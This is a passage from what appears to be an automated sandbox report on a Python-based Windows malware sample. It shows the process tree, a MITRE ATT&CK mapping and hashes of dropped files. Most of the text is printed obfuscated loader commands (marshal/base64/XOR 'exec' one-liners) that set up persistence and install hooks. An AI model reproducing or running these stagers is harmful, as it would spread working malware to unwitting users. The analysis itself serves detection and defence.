nR-qs6CxxcKKeEtOZC6cJlKF1Tkm3S3pSizuucYEC-Y0ZeJ3Gwq6mmr34sWjVFGjSwtQ0Ec7X4o0ePK8r72AlFZWtnR0mnZytL1jv-dQQeV7pc4S-W4EyNottheVQ-ITXOczYwQ_93JDohnvdovO15LmNCwa7MIQQXoS1reb0mK0vjojUyXRNXFzdUgGnzTEHk7LGhJPI7EN77Rjs3jhC649zeXaRMCR365UddwKSYJQk6S17CvkEF6tE3511HKJnXMWSbEJ3r-llNoxRvXPayNH73JYHlStwLJ_P4iVrynLT6LLJuwZXaBqOtkKS1k7T1UJdLpVd0dNMWHZePpvGg8E517aSS_UBmoVm7PF-VCi9zBeSpjnogLYWj7Is2Z9Iw8Fjw21ZBgoO2I4wDuHlFqnkuhXwUpirvNJ5itMx_Zg9j3UqwsM6E-Kt4tYFzCxut6nWTd_wAc4wzzfrCkqLtJ75y1rzawZBnfYsAzcfZk5zSBn8L7JqkrMDXQvzKIi63ynvgujG6f-x63fXmShApKn_trGngeWsjlpX1s8QlWDsvt1d00Rr1ewD_VoL6-QSDiFUKWLTl8hAJoZuJ_4fyduUPiqlpFP9yxJs-zWvD4wkU0dQBH_pIxP44IfycvJ8vr1a4pUsfDBLgaYDdmAO6ix2Sk7UarHWX6L_5ofM6K50QKpZEj9rTLgJokwPeo3izq92bULG-Ltmf0-cUaXqF14qeuc40zGziwoXGs0BQVUPQ2QVcgGjqPXLyo9d3k0p5sOPH8sdSFr3nYVRgjhKMBbv4xA9Dv3ZpBYEscY2pwngrZ14frQvzqYEqK5hlxx8r96XmDBkgi_muELrIZS98gHXpik7TjT40uYFlTpdli1VTaJwHUVi6ea1Leq5PkDo3nFgXFZhFpO-Zo2Vb97tKEcpdTJnmHqy6h8MzDNxYLEwJoqnI7mOAizA74j3LY9EO4J1X3CNbTYo4MOveSGaMd7v4odVijwFSQmV963G5jNsetVBpudxzk0MvahhaabxA4XgaY7u88-S1U49UychUGYvFhcuosEIO46SKPNAQ2MJt2B8_FlwMBsC76WiFUSCYTyAAqXDCDyZ-8yf0w4B1SQkVoR-N5iHW0Y11pfMBV7Q0KgFJzCZppTdZbJ7cKVREjW9CMpWcM4LZjVF7tINgAJAU8ZQl12KE-1gReT1fxsmvLBAxNgofvf3na0AY4ycE3S-P8--YmZ1n5GwMvOWsAumr-4gUG0QieB3Jxhgi8e_US2mFm9try42p19bVA3M3DTuNNBc5IBAfIyaoV2UBHVBazq4inuXVVCCMyJ0Tm_Zz1YSd3DnbPkce2eZD3m9Hp7x1JXmbmkNnIZ8Y5tVCTykwRJIR8my0Z7bqRhY4GSe8KOlkJMHRfgdohGEqRXq-oZ9QxiwStQv60InmmqFdEjlBUd5JmsGyKMIlFyTbeA27ZU4t6SnyPtYNOvqVcgbgAEljz7xv04n_oAbnvukn9ni4TLZygvsM7xf2hP9MuTN3Xv-TCNTic6zV9pY8dPkc3Ec-O1ufMlbnXfEXdypxv_LJxfALEj618wrv6_85kB-fK701wVnwk4PKENuovspV4Vh4IXdLlIxAI9c3-ewIsy6VkQCTY7oS86q6cDcXUQLhb-22EXUaGzBSldprg8TRDy2PMGviEcCtqZopnsYjx7eFrY2Q61cf5dV2FDCJm6FMKea3LMfpCo-4KGbis14W6Tfg0RYU5Py5e1GxPBOX-IoC5lleFxEUFNb9eFK9ei8f4svrwsXfgioW64a7VU0yvgr7pIG1ELxTdxgRaR_YrP_vtewOyrlWC7sseiLW8FTFZXL60jpVb7fUqpJaqxlvYOspr0KIHf3UR38NrGAr95c4xcI5GeQZhMpROTkE7LOQ6g7ppjnhtIHjsAQsCZBo8V49BUO1LszqQ898__iV2M_tKq1GLPDSD-Crq4Rxt3q06qOYrgAbC5EMC_wwLzZNdwLhDZnO3uTNLHtXpJoCXloq2KIgOZCHb9vB6f7lXf5JkafRLYpObYunZILO4De4pYBB6X6F-NgIwzQrrhV-9x77eCzauS4CgIBfI7RZGshvrSrECxxS4CgxPxAQ9I6Q17td7Gad-shB6b41DRexizKX0qxqf19lDCyqwlvA59eGjUyWs5xqc4WO4cx-quWIsGg52nWbqxV5HOHbuzKSiCP0ZOlPmrCQK57Wjv-f-J8iOHtr649TTCy6uqj1SdwcKFFjMIUta67A9MLxHSY6WR7q-S0YMOj5wGxpK1O1OjGVLDRJdWnfyC-SwXOusTjM3BGZkoQe5fQai8LXq3Ek1V_6vnGaW5cBR5lfEAwUxKGO8DGXGExSoTkAd5CnSlB4ueJFxYlKeVWCs1Ry-JPJGIjGy_xj1YepJg3RLRmTvaeiYG1SHvPMzpy8qYK8UkJn8z_PwGU0r9KZWaaFuWoTbZeU8NR5verEOtNFyMOROJr3UIO9Z-NYOXnNXZ8g-tfb3bVmdMZRgPe3W1gfkUJ6vcmI7GSmB80kTdBsQwfGuQHVR1jrQkahI-fYvH3gxYvEl8CUWEL-DGMUQ7fEY8oc-im49NwjWQ9s_3timTkONYPfKTQKGbDjzX7eGPtWz5MErlmmulrJPX5HhMqwVH3nqCoAU7ApXqsQ2leMTs7KixN6dU-7qdZ9dI_0j3Pv2FOueE9MsqAOtP0NeFdxkjSxMhK9AM3dAz2gYjuL5mZXLBsNmpoMxuDrkBHZaBz1QrY5Ub36Ow211EQakDBINk_TvQ8FSP7HpPd3ZE0wQjx82-2Dn0yWXRj16sGxTkUc9mYUwI8n19iHPKanL7Wt0ZkLSQEwLYRiPhdinlwA6__iV-9ZvDJGP6Dy7IjtuOf44n6XH0phTzTLdyOKFy_OLXnr59AON2MKT_22NUZ3XXyTw9zV5JUe3VW3ueISMJ5obWZbU9fkUxr-XHbHRhUBORBYsWA3qFmyAsKf4n0ygKuex2Wyfy_JoS0DIoFK6lhsGnADHmAHuXYnJaH-a0XrPqCoFmTIQuO8AoxLkhk2gcBivfkeKhV7vCOp-wGz4EO97aSw2Qz3CuQ_AzuEGWH82oR97Iih8yQdI3qfNq3cu95wjhtlpL1yi8Rosg4ur7RxN6rcLRHKgYP6gbuJti5Z4mSy90niJxosNLsHe5crc9Q7HbjoCE2ByqJ20zaPSGkNLRcxtHYAOjdJRmdJjApaJpJCoVw4z2kDs3RBfULbkOHcEgFneqkShm9aaLxZcwTfCcekjAACoLXAu3LFbv80WWrVkc0rhnbC8nzy9fGJlAjQB3bva65HXcVLM4yWTnPDRwrMAHjlnb_a1kZshEbQVTOIiCDTgJHwPoZOCwnU_xZ736Tc5l3282C0ferUFMj6ix3NH877jz10rXomD5NfDuQRw2tN9eti1payHoQeT12QYugCg_vRT_YVFbqmL8uQcdTL9nVXlV_vRC6_ER39gFc7uFnPgUMxAJwDkMuxQFzRA8VN-KD1utzouiGazz-oV78uDQ-qs8QHYtYdWRE7FYz4Ra9s9E6ifkjSHUGb6lmapemwCrJtP0XqLLuJahuH3M-C1BGKqulUV5jW7GOyW1I5ceO4ZowJMNPm59nXQB-lduRN0B38siOCAej2EhWFW-eTQJbdGv5XZ7naO_JGwEjbdiGDvLEH_zjqpwcN7bMe0awFa7PcQafjhGswQ12KoGNIpCCNDW6zfKBLIpT25XlfLxLczJowdhKyJGAraeYSaSh3BmTdGx1wiiwmlMPPfZMkMl6E48Fe5Xzr63HnGBffiBRtjE4bVJz0JK_5QE6X3swu_uka4e2tysAyWhH9jMWLJLDkZvjfkvWXq1XVbe1eu4INN4Ir4jYx-Ur8WLWnFCX2cM2_it45UVbsfS8X1gX7vkEVnNwE4vQxCXvLufcbcaTyE1rWy16QGNZPAasGgFr8QOqpq07egJWVwq9YvAZvVg5MnJHUQylcLngUBlEe0na-U5az_Nq8qP_GLYHX2RSaAIbrnr4lyFgbf_yooh9OXCXzjR7tqLH1ie3-DVD3fJBIqwGn-nNRHW2OdET8MSH5F4NvWp0OSoAycAtiPPEktUGXxrbLmh59tlNgIevkj5yzsfHK6sCn7_MrpaabhSCSbrkodhIRXySSFS21inXQuqMhWo2XpwqDLJ0NkzvrBtlq3myjnENk8Kv5NaJ-JWyPv6Dzm0x25NG6BXk6omS-QJ38w06oxq5SM8F5741xzpE4JF2tkKAIf7fKBg502ssemcP7RsKW81kLsbMpR3DF3LakoHyu8_prD-wGGwwb1nfB7DyRXw6S-3NXcVy_RGClfLUclM8wU8yNH2B_4NugFEmeARHm9ZBRfX-xsZIplNIX5wL7zJlKUaJe3jPLjUzaDry3GLl43SBxtRvPLYHznXmNiwKLLWCmHXxVyfBqk5WnQfZ4enU330xesSmzG3JS7prKGQ8jyvkcC-TDIufgV663XPZPTIGgICyHtcwHkRh1HyMEmt9T9yjKU1pJEbURzgUW_vj0N6tS_uq_2pHcgHvpPFKZw738D_G2Z9ALfoyjSCf6s76eNsvF0TyGmSN-JJMiLTB9Op85RMh6S6Few8tMiYgEH5GXBA4Qt6YDGllJcY8ApQIGhXd0UUPh_ECncx1sE7QS5odD-RS7rgR4QkEFImbN72vKbJymDwsH22eoJrRe5hlm7Hcqbdq8qEvpp737gvWnJklyc92pwk8nINZmy-_GwPaSZReI5qZ3G4Y-zo35om1LaAhU4Pi6In0lqprptnDObxk6jkBhZ1jgZQMi49IXt8WcPuK-SD7eNEsd25W2cbx0MQpD8Y0wEftRpsQHr37S4zZzdHVnQyeLmSx8GJmV79ULivtMbcjeMtfqyzgJ2UHIM5Iv1UppiKXewB7Ho8AuFOgiWR0C9yk2bWiT3JJ8g5Pyh6_02UM2u2FHOrpYl1JNZemUoM4AnV7Xi_63pQPpdjH-b1fa0_uvlArz1m0B78JTOgX5hYVNudyboJJT_i-7ipp8mPMGGjMYIKJJyCY2GyOUIoycFyJqIYDUhxEEBXIaoe1PrXHiCK1lGycxjL9zTYrsZoMdeoQqDbox3p9JMEkHB08CuSak9zkMZtIBy_cRXy-YhSDUNYpo61epQiWdFLrVND36ij88weMkCbNgPDZc2AqJm5z3iVPfV128oVgAHuW4yvEPivK_CYytQV6jYTHkJXRqyMTvsjoMMVhIie-Ac0THjj1TqZNdAe4T2nMmaw9AfkuiqtzVM-n13bqHZKWJZNBtvwivW-Lu7VMKIhvAFbAkSSSINB36nSkapBbnMcFw6-Yi5a2nmsK3bvWmcX1LjOFm2yfktls_kYsNIBLfKiW8oz88izAQQ5HWyzZM9MbKKOHnMVFJPbTntfT8q3dwkizJTUeoO8tnvpojrOLqjR5__tC7eHArby9WMGk1O6P5O1WzNrcZqtyLm8uLdV2NmL4VoVhTgHWt_A_177nPICgECtHOHq1sELkJj_-SYteZU9pAJZCWytFRbuAuGrPLxxZYQO4HwTuEoyZ2FAkfNlUx7dbfP9mNZK_fCxqloaDWpkavvA-ohf114vDy6Wowe3Z0Zda0c8hrxcr-_GG1l3hQZ5yf8nHWLY1XirU55OG6_qHpYYeInZSQU5Y8UybkvpIA5s4Fe1Eyv2Q3f8uwQSPbCzaSuPUf5G8M3vHFUTVoziYmN_9WGnpWvmSXMAI5UO_nBTTKmYpj1K4_KA457TtxoCIRLTuw66Zo9ZqVS0QZRqa-Hu8q4dZRzWH4olLdcJTgOLzdE6CrH5WnnLQF_ayvIV2WKDJxaVb8_1eQM4naQL27W9zrCqaodD2bDHrQdwLXeAeWYnT4bwJu4Vc10LcAttQxsR0YcSTKKzRk8Et45KILC5JkXRkSPtBIn3eUdRvldokB3CmL6VdORULIKSYxjlLdi7t5Qwc-6xIf5LgOI9hiQnE9lxMYfkha-Ui8oQqz9iw-v0pUZKuQm6bPuaBWBLndg16qBD2YwrE1LWCy5o4ZFnWNOb5ERXyvdvdyfGx-b0ZtkQqeXrnsnVUho24673NtLuCLUe9r-ux2NpMgpIyCOPD8FJ_bQtTxacEqYHjWj16r-fvAaiZ_ivQqJvnWYv53g6sUAIOMlhKxQzwXYvynsGk6Uj-l9bKAqZnQnUti5curfq56ajd2JR6kC-1Z7s9aEl9Xv-fewPSpKysM2VW24A184HUGDtwEvCo0Hwf3NHM478hmeH9sMpWUAG3c3XeNNxEigt7rlVf7enw9DXeER-zDG3dIKry8Ch-m33eSxnFcmrphDtEy8EElh_0MYB6xr8wbfHNdNCI_amEVIinYSdPv2vZe53T-BZA-RYAVvi7F2c_rHu8-JWd6-iAgJcgmfZ9F9Eka0wBFac6N5UeCPpIyDxCssJBQsrJdBfDbxeEiTMcB_pEUdXJA7gFG0FRQxMiy5PsX1EXGSiMj-i8y2dVSgCYsNNAp4gmoTAIHZvuc6Qw2f82GEqXrJCOmF7CepKMiV4gRVeC2K0mDQ2AvO44voDusPwxc5kNW-u3_RPAqs6UJlrkVxa_rmA7TRD5xk1MNXgu8_d75w-Uw5e0cjRknwKmwDQCNWRhxMr5TTKivBBb6AfgfoUZvOXAq7luw8kOs_nQ-GFxYIvzdc2oUjbUfv5D88eNfL59iltnmkS46vUJbq_l7-UrEVTn8mtm8YfmaNOpfwHegKaAv_X0J2X_lrmvskUDnsCwTWT5OqfTiLtdiIAuTJG4cnTB1WAQNr-6lHSbDXleZTlaqYivVWXk703UuLyCO4VmHnQ6__jG0VWAI3azn16OW2hzuLSo0Nhp3rLm8gETwvPOD4oi860UJnO-UTGy9IUv4I5fqmKgXHpqavsc7ZOVQl8am96ipB0zZOLwdZkjJjfw7RNonuT_Iq7RVkH8c8LOPsYXdOj05pHmqy-x9LhGGx5DQwRHoQmjA7NwpTYYaXqEIyUJCle7zHB56gBgaIvMYbaPUncMtD7HlTrsLcrY3t7L8-G5gDpSVfqHO-viqF1MWrAbzDsYtGYpgJCDRZrJUhdgqKHv9PIPG3DyMxHl0V21jFJgX3BWuIVCh5LQRopdG6xylKWbtNkVcKK3DpfZjIx4Y2HoK9I9w3OcSKhVL9Xuea4NDt0pLg_3zBv8aq4fiKqWIqM7irFGrlgAzfptmmTbBZbTg5BU7FUlGwbUv5jnkNkUJYNfX_WEi4hIK7YPnFVqqQFY0poBEdRXpiLtNrNm4wWJ4GUfgv7_XoFAKjwOCenkq9x82gfU0OWAMv2bU3b6V29fJPWmHZz921q5JDOjfd-TAA9bxUjF_FRVh9IVcI0FgpXqW4ux2KSSm6CR50EiObd8zmQCg5LjEUjx-3M7voHyutsmi1yR6E-nY996lmue4cDgg-zKJeL463E5EWU28DVWOfxaiqQKtbFTcf9omiHrMYP2GpBXLEPdm8brfYk_ZyfG2hka0M8cI3UOM1IZlsvf8SzvaUWkmHmFtQjiORpNwsUkJr9dAhE_dYtAGn0AzZmV8G2M73hqCK37gi6Wi8DMjL2aSyQSxfhtkzAsC6KBs8_MLzartCEu92HqM6pmgYi5MjzLSADJdmWY0VAflSdodItnwnywqUjpfWkRty-Mkw57fIzlyW29nzGR725RbQYgrIvX3n52yYyTpUByjre-k1UkeEI76DreIoYpvO0uyOQ1BG9dkYEzX9WuoRcim6N9OBtbPToqJzx9_Wh5hZLDQzIs4jJzWZS9rP5SlUPkVs-vFIDTphQePI0V0MjmEaZe2CjnoSrBQPwnZkOMGZLZHL_Midw3BP_Qy39y4sdEgPbkSw2nkcICB8RF9OXsl51dBCPjG8b4QiXrZ2Qd3eKR8JNyP8ZMqM2B597eHQfnL7Wr_zlHMefR9BXv6Ho0PEoB4l-IEGiYXlbj6vCCJJ4HNDVCH_CU8bV3xuTl8f1vBccl-gSyPNbnXWoKDgxF90wDVYKlFL9EDGcdawSX3not6nZfj16kjYWx6-j8St4_RR99sExUXjGzcZu9VF9_7WG7fC4Pu8OAOPH27BzHY1x1Wdu2cq6SqOnztXoIqSAndLHSQ_fmTghtkvDAyxyc4q0MRg-Ox00YaWiBk3LDXmkQWtUyzg5SdRRgDyAsJ0TJFHH3TjGqtyNRs47LE0dwZRghDxj1Xf6dpmL59SLoGgIjBBd71JcajVejHJ6WxKMqV1lutDk28NHfzEfOe24l8ybRf68PAI_oqN4Yb22XiYeSIKBsPfhOCAGYIMXmU9-gbCsXn2zQf0UKygDvE90x_IZkRf0qmsudPKR0elHyWKwPuwVQwLvDUclQtDQnkQNh_IITfRQV5eyTmGHKdUTc4FLtlrFWmX2KcjV461Ov7TwP2rnIkoPJOU2OKMAB2DVZoWzdyZHJdVYQqpdJZOcyLmMCIEWgYMr1kKNoFP-y-YU0-OCSRRxd30lew1_zrUsvcRR9yXkZI880hV179liLWNuZIJUvsipySYtYCXT5BfoNA_mdbwf2X55LPh1MsRisAs_r370g8qtjxxFVIaLuvuAtobNbz6YRWACWiK2YL1_9ZgTgU9PesY0Up92r7sXStjhGy2CesyHduEPQ3BxQOsPOOnDCPcFGx67HoAfMMZJVCRU01b_zeHWIaIBJJ0USxUwu9CHAam58GmN6wwlSWBfaYo2crNq1IOUjxroB8r97_NwfTwaoQ_9FF9UsvZc97ZJhseSfawbVmJ51xpw_wQg8UCNN8KrsGTGBKQlH1eLQWQz4DnSvTS4-EFij2Md104DxbuJXjtPO-aIGheWWkxIjGg5HnJdZHuK7smweKBB2cDXAc4K1MS6WzBq3SU5nyWtwHVY72R0ES0Z8FXro7TNzFNoCDbahkXHC_7ulqmFo80u17QStdfzX4GGDFFlHFBMcaxbQDzP1Y3T2gQIJ5CaaQTKo0gPbpsr1WSvmn9b6qS_sEeyn_7pXA7VmcAVFSYHvVxIdRXAzq3PuGTLYRcLRvJINA-z3rAVr6IYkT5U_QUd7lalY0mk0vSJrYZLoAkPYojNWK0HbBXxc2k9dl5UlFT4USKNrhXv9AYTVLyE2v2A2H0NgR6Z7IMWOEhZfCfrBZyBM-abrNiSRVZnq5aRzMh-LaTDv_naRtLEhw32NdlJgPdYgSCtudBEcJmdK0ddqag8Wg12zm7oDmaEa-WvcpAZ81XGhZa-1__xFi2nSd41e_HXpF0nYJEU3yAjOZ-NHRVsPD19gMtVOqNRiU0WzSvyXceAqRP6TjfnCSvaiCzA4QYf7-FcQmjYx5nfkoax4vyD1lehzrZfLc8tRFzDKuN8K2o3VavimYHvaYX4Dk3cGIRgJrsuUX-aQPW6X6l2lj2pR1RK77ArrkVQp451Zqss7Hz7AbwDVws5iizRvz9KsPvhYOImU0dNg7MC3rx2hQcuyg=='))"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:3720
- - C:\explorerwin\python.exe
    "C:/explorerwin/python.exe" -c exec(__import__('marshal').loads(__import__('base64').b64decode('YwAAAAAAAAAAAAAAAAUAAAAAAAAA83AAAACXAAkAbgcjAAEAWQBuA3gDWQB3AW4FIwB3AHgDWQB3AQkAZAdkAWUAZAJkA2YEZASEBVoBbgcjAAEAWQBuA3gDWQB3AW4FIwB3AHgDWQB3AWUCWgNlBFoFZQRaBmUCWgdkBVoCZAZaBGQAWghkA1MAKQhU2gFf2gZyZXR1cm5OYwQAAAAAAAAAAAAAAAEAAAADAAAA8wYAAACXAGQAUwApAU6pACkE2gJfX3IBAAAA2gNzdGXaAmFscwQAAAAgICAg2gZ1cm5hbWXaA19fX3IJAAAABwAAAHMGAAAAgACAAIAA8wAAAADpAQAAAOkCAAAAKQJUVCkJ2gNzdHJyCQAAANoFcHJpbnTaCmJhY2tfcHJpbnTaBGV4ZWPaCWJhY2tfZXhlY9oEWkFMS9oFU1ZUTFDaBXN0YWdlcgQAAAByCgAAAHIIAAAA+gg8bW9kdWxlPnIVAAAAAQAAAHODAAAA8AMBAQHgBAjgBQn48AMAAQyAdIB0+Pj44AgM+IgEiASIBIgE8AIDAQ3YBDvQBDuQM9AEO7Ak0AQ70AQ70AQ70AQ70AQ7+NgAC4B0gHT4+PjYCAz4iASIBIgEiATgDRKACtgMEIAJ2AcLgATYCA2ABdgICYAF2AcIgATYCAyABYAFgAVzJAAAAIIBCwCDAgcDhQULAIsCDQORCRsAmgEjAJsCHwOdBSMAowIlAw==')));ZALK(__import__('marshal').loads(__import__('base64').b64decode('YwAAAAAAAAAAAAAAAAcAAAAAAAAA87QAAACXAGUAZABrAgAAAAByCgIAZQGmAAAAqwAAAAAAAAAAAAEAZAFkAmwCWgJkAWQCbANaA2QDZQRkBGUEZgRkBYQEWgVlBloHZQhaCQIAZQVkBmQHpgIAAKsCAAAAAAAAAABaCgIAZQsCAGUDagwAAAAAAAAAAAIAZQJqDQAAAAAAAAAAZQqmAQAAqwEAAAAAAAAAAKYBAACrAQAAAAAAAAAApgEAAKsBAAAAAAAAAAABAGQCUwApCEbpAAAAAE7aA2tledoLZGF0YV9iYXNlNjRjAgAAAAAAAAAAAAAABgAAAAMAAADz9AAAAIcFlwB0AQAAAAAAAAAAAABqAQAAAAAAAAAAfAGmAQAAqwEAAAAAAAAAAH0CfACgAgAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAACKBXQHAAAAAAAAAAAAAIgFZgFkAYQIdAkAAAAAAAAAAAAAfAKmAQAAqwEAAAAAAAAAAEQApgAAAKsAAAAAAAAAAACmAQAAqwEAAAAAAAAAAH0DdAEAAAAAAAAAAAAAagUAAAAAAAAAAHwDpgEAAKsBAAAAAAAAAACgBgAAAAAAAAAAAAAAAAAAAAAAAAAApgAAAKsAAAAAAAAAAAB9BHwEUwApAk5jAQAAAAAAAAAAAAAACAAAABMAAADzTAAAAJUBlwBnAHwAXSBcAgAAfQF9AnwCiQN8AXQBAAAAAAAAAAAAAIkDpgEAAKsBAAAAAAAAAAB6BgAAGQAAAAAAAAAAAHoMAACRAowhUwCpACkB2gNsZW4pBNoCLjDaAWnaAWLaCWtleV9ieXRlc3MEAAAAICAggNoGdXJuYW1l+go8bGlzdGNvbXA+ehh4b3JfLjxsb2NhbHM+LjxsaXN0Y29tcD4IAAAAczIAAAD4gADQF1bQF1bQF1a5ZLhhwBGYAZhJoGGtI6hpqS6sLtEmONQcOdEYOdAXVtAXVtAXVvMAAAAAKQfaBmJhc2U2NNoJYjY0ZGVjb2Rl2gZlbmNvZGXaBWJ5dGVz2gllbnVtZXJhdGXaCWI2NGVuY29kZdoGZGVjb2RlKQZyAgAAAHIDAAAA2gRkYXRh2gp4b3JfcmVzdWx02g1yZXN1bHRfYmFzZTY0cgsAAABzBgAAACAgICAgQHIMAAAA2gR4b3JfchkAAAAFAAAAc2sAAAD4gADdCxHUCxuYS9ELKNQLKIBE2BATlwqSCpEMlAyASd0RFtAXVtAXVtAXVtAXVsVp0FBUwW/Eb9AXVtEXVtQXVtERV9QRV4BK3RQa1BQkoFrRFDDUFDDXFDfSFDfRFDnUFDmATdgLGNAEGHIOAAAAegkxMjcuMC4wLjFhJAQAAFVqSTNMakF1TUM0eE1USTNMall1TUM0eE1USTMzVlF1TUM2bU1WWTNTakZDTUhReE16SlNMMVFzbGk4eE1aazJMakF1TUM0eE1USnpMbTB4YWl3ek1WYzBMREJMTUVRMU1USTNMakF1TUM1Vk1wUTJMakNGTVM0eE1USTNMakF1bGk4eE1aazJMakF1TUM0eE1USTJMbFFzYWl0Vk5XZzBvaEJLTVgweEdEZmVMakF1TUdEWU1ESTNMbEh1TVM0eFVHVUdXVklkZWg1NGVYaGJUV2g0WEUwQ1kwaDBRMnBYVWh3QlZtc0VaQVZOZUh4SGF3RjlSbE5wV0J0OVhHaGJUVjBiWEVweWMwSlZkbkpZVTBCZ1ZtQmFlRWxNWFhnQmNseFRRVkY1U0VKNGQyQk9TbWQ3Qm0xWWNGVitiWEllVTBCYUIzRmViMWRuYzI5V2VIRjJTV3BwWmtSU1gxNUFTbmhqVjM1aWMwdHRkbllmYW5aL0FWRk9HMTUwYUg5ZWVGOWZIbFJtY2xSK1dBcEJUVjFvQTJKY1ZVSlRhVmdmYVVCblMyaHZaRnBNQWhzQmEyVUNIbnhEZmxoVFlndERkR2hrU1V0bVNVSlVISFVkZjMwSVJsRi9iRWRpQTJSZGExeDZXRkZwWmtacmVYOUJUR2RvUUV4WUNHRlZlMVJsWVgwRUFWZC9mMWxsWXhzQmEycGZIbk5IY1VsNGNuTlFaM052VjNScFdWNXVWMWhwYW5aN1JHaHZmMTkzV1Vwb1VnTjFmMUllZGxkUVpBTkVkMXB2U1V0ZlFXSlZIR2tlZlIxVlpsRUZZd044U2twQ1VuY0dRMnBDZmtkbFoxWkhZMlYwUlVvRGYyUm5mVk5lZkVOalhXc0VaQVZOZUg5ZWEzVmhSRk5BWEZsVmVYOUhaV0ZCVjJkeWNGVitiWEZKZVdsN1NHaGdhRUp0V1c5V2VIRjFRbFZwZmtKU2VXTlFmR2hHV25ScGN3SldlUWxiZVdsM1MzdHdld1p0V1c5V2VIRjJTWGx0Y1VsU2RuUk5UVWNURGNjek1USTNCemIwTmt4UVFsY0JHdW9yUWs5ZlZsZnRMMW4wTkV0SlZGSHRKMUlZQkVwVVVsMVRTK29yUUZ4WVgwYWVMc011TUM0eDZ6UkNYRjVQWFV2TE9RNWFRVlJiWEVzUFF6ODNMakF2TUM0eFFsNDNMakRlTXk4d01PbzNJN0Fqc0NPeFBPbytJTGc3dUYrNEtiNHYzakF0TVNQQk1URTJJN0J2NkNvNXNYYm5KeW1tSnZvNEtNSTNMaXR6Tjk4eE1UaHBLY1F1TUNSdk5zTTNMalZ4TjlveE1UZG9LY0F1TUN0dU51bzdJN0JyNkNVOXNYYTNhc0FwTXk4OHdUSTBMejFjT3k0eE1RPT0pDtoFc3RhZ2XaBGV4aXRyDwAAANoHbWFyc2hhbNoDc3RychkAAADaCmJhY2tfcHJpbnTaBXByaW502gliYWNrX2V4ZWPaBGV4ZWPaDmRlY3J5cHRlZF9kYXRh2gRaQUxL2gVsb2Fkc3IQAAAAcgYAAAByDgAAAHIMAAAA+gg8bW9kdWxlPnIlAAAAAQAAAHOtAAAA8AMBAQHYAwiIRYI+8AABAQvYBAiARIFGhEaARuAAFtAAFtAAFtAAFtAAFtAAFtAAFtAAFvACBQEZiGPwAAUBGaAD8AAFARnwAAUBGfAABQEZ8AAFARnwDgAJE4AF2AcQgATYERWQFJBr8AAAJEoR8QAAEksR9AAAEksRgA7YAASABIBdgFeEXdATI5A21BMjoE7REzPUEzPRBTTUBTTRADXUADXQADXQADXQADVyDgAAAA==')))
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:3840

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x46c 0x4a0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4184

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\completenminn.mp4

Filesize
5.9MB

MD5
de9e67b4b1988d57a3acdc8da15fb2c4

SHA1
e7d56ce66bd088bf78a0d6b80f15a0e5bf79caaa

SHA256
37f9e7eb3a98986bbfa2730af854698f8b3929dc65a5b791e878126103980d52

SHA512
4681d6802c619163b092885e5c29d9fda3b80f5480e5574082727d709cef72161606ba275299e7ac69a1fc09c8e9149f6a96079ffcd1cc2fbca72eb544afff1e

Download Submit
C:\explorerwi\expl.exe

Filesize
5.5MB

MD5
474097ee8b7e15c7373984c4879d955c

SHA1
216c8dc21363edda6ab12584c88acf04d72708c6

SHA256
2bded890c6af9ee23b03d4222ef4828c55fc1feab3eb34a7282cd93bd1211990

SHA512
d40325d17ecaa922c9701cf4ca707826438083e7a74c224175e137051e456f89298d986e7a4e1a81afe1a39ad95efcfe16774678313632c517fe8095f9a26b53

Download Submit
C:\explorerwin\Lib\__future__.py

Filesize
5KB

MD5
7db961704ab133d2b2794b860dd043bd

SHA1
8dec0f7ee73f28b789e2d42c85f23a1e52aa361f

SHA256
bf11d13b6c9b2b8706be425addf399965738622bb4cc553217be16399c51d51a

SHA512
ef15aee508686b41348b66956eab6b863ba789063e8adc3d917aa75afffe664bb22efdb73242be24ba7c595b235ef43688f314cb76b9759119597d8175f96384

Download Submit
C:\explorerwin\Lib\__pycache__\__future__.cpython-311.pyc

Filesize
4KB

MD5
4f0e1d8fd8d4d7acae57888d2b7752b5

SHA1
1250350d2c1100ddf7220b4b1281d2c2e18eed7c

SHA256
993d6ef223ed407256845db3c7a2e817b526838cfefee66a1c333a228c5013d6

SHA512
64d12403933eb029b68beda0ccf9e72be111f9bc4e94c0cbfec2663eea760d9d6e3c7a11286f7f1e017998140f90a8b2c311950fa6a451b9bae92568cb7f1d09

Download Submit
C:\explorerwin\Lib\__pycache__\base64.cpython-311.pyc

Filesize
27KB

MD5
cd52f4dafcb9d3c289b3476b0044e240

SHA1
00735fe46d79f65da335305de0669678bf398f35

SHA256
2712b9f88f2c42416eaa624fba2e87530fa00cca777573ee9f19e4d48fdac13c

SHA512
a21fdbac5a40974f91913f121ffb692194791526806b73e803d0321c89758b3f91691040221f9e2652e78e402bcc39448c180bda12c3d8417ebe4ed319098f3d

Download Submit
C:\explorerwin\Lib\__pycache__\copyreg.cpython-311.pyc

Filesize
8KB

MD5
8668751ce394f02d7fa57daf24384090

SHA1
681d991b6df0abd01440e82502283353274e6247

SHA256
556e87434c92d215ae4c159f9839dd46b7f74159e813fee40fec2bfe0c72f4b2

SHA512
4bf7429d9227b7afe91c6d7275fbd065019d8a08a5b6d234e360947845a1fb5176b650e24ad801691fbd94f346bf430125c415a37911b9d2e74a4f2c78850ac9

Download Submit
C:\explorerwin\Lib\__pycache__\enum.cpython-311.pyc

Filesize
83KB

MD5
f72f5c04d98d8495c1f241e0b050f34b

SHA1
5d6d7be99ec10e3d5f376e91968d86db1b5fc3b5

SHA256
ee33dfb2f0b410f53b9450cffc2ee82e6dd1976e08b9e35d639eed565b803cad

SHA512
